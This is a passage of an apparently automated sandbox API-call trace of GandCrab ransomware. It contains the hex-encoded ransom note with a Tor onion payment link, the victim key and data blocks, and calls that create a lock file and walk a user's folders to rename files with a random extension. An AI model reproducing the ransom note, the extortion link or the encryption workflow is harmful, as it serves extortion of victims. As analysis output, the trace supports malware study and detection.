x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0087.231] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0087.232] CloseHandle (hObject=0x230) returned 1 [0087.232] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.232] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.232] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x20, wMilliseconds=0x21d)) [0087.232] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.233] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0087.233] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0087.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\d2ca4a09d2ca4deb61a.lock") returned 54 [0087.233] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\cookies\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0087.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.234] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\") returned 30 [0087.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*" [0087.234] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0087.234] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Cookies\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0087.234] CloseHandle (hObject=0x230) returned 1 [0087.235] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0087.235] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0087.235] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0087.235] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock" [0087.235] lstrlenW (lpString=".titwmvjl") returned 9 [0087.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock") returned 46 [0087.235] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.235] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 55 [0087.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a09d2ca4deb61a.lock") returned 46 [0087.235] lstrlenW (lpString=".lock") returned 5 [0087.235] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.236] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0087.236] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.236] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.236] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0087.236] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0087.236] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0087.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Desktop" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop") 